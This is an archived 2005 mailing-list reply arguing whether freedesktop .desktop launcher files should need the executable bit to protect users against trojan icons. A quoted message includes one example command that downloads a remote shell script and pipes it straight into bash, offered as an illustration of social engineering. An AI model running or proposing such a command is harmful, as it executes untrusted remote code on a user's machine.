"Name" key value in desk. entry spec collides with file names, could misguide users?

Sun Mar 20 19:55:01 EET 2005

El Sun, 20 Mar 2005 17:04:01 +0000,
Mike Hearn <mike at navi.cx> escribió:

> Requiring the +x bit on .desktop files changes their semantics and would
> break existing software. For such an insignificant change it's not worth
> it.

I must admit I hate compatibility when it stops us from doing things better.

> It is not, you just have to check the right boxes in the properties
> window. Anybody can learn that. I don't agree that this would have any
> benefit at all, not even psychological - fundamentally writing trojan
> horses is not difficult and if you can convince somebody to click on an
> icon you can convince them to copy/paste some meaningless command into
> the "Run" dialog like:
> 
>   wget http://foo.org/bar.sh -q -O /dev/stdout | bash -
> 
> which achieves the same effect.

Downloading a file is very different from running a command. Many people won't fall so
easily on  that one (altough some - very few - people fell on the "write format C: trick"). Why,
I don't really know. It probably has something to do with double clicking being a normal
and trusted operation (the basis of their interaction with computers) and pasting
weird commands being something unusual and obscure.

> would like to see Mozilla automatically set the +x bit on executable
> files like shell scripts, in fact I filed a bug for that in bugzilla.

Well, considering that even Microsoft has started to do things like "don't allow to 
save this executable attachment by default", I hope they won't listen you. People
who use mozilla are not meant to know what a shell script does. And....

> Why? Because I don't believe requiring a magic flag to be set to run a
> program makes things more secure, it just decreases usability. 

...selinux actually makes this worse, by not allowing you to do anything - at all with what you
downloaded. And if it does have a method to run it, it's not different than the +x solution,
expect for being more complex and less portable to other systems.

> 
> > Anyway, requiring the +x bit WILL improve security at the end of the day.
> 
> Asserting this doesn't make it true. I don't see any evidence that it
> increases security, just vague ideas about what people might or might
> not do in hypothetical situations. 

Again, this is not a hypotetical situation. This is what people has been observed to do
for years in "other platforms". 

> In short, I think requiring +x on .desktop files:
> 
> a) Does not increase security

I never argued that it's a magic bullet, but it _does_ increase security - by not allowing
people to reproduce stupid behaviours which we know they do. The +x bit idea is meant
to avoid some stupid behaviours that for some reason people always do when they
face to them.

> b) Breaks existing software and specifications (this is BAD!)

I agree that it does, but I have never cared about breaking things when it means
doing things better.

> c) Gives people an impression of security which does not exist, so
>    reducing incentives to work on real solutions

The set of population for which I propose this change (ie: more than 90% ) have no
clue about what "security" means. This is not a real reason, it doesn't stops people
other people from working on other things.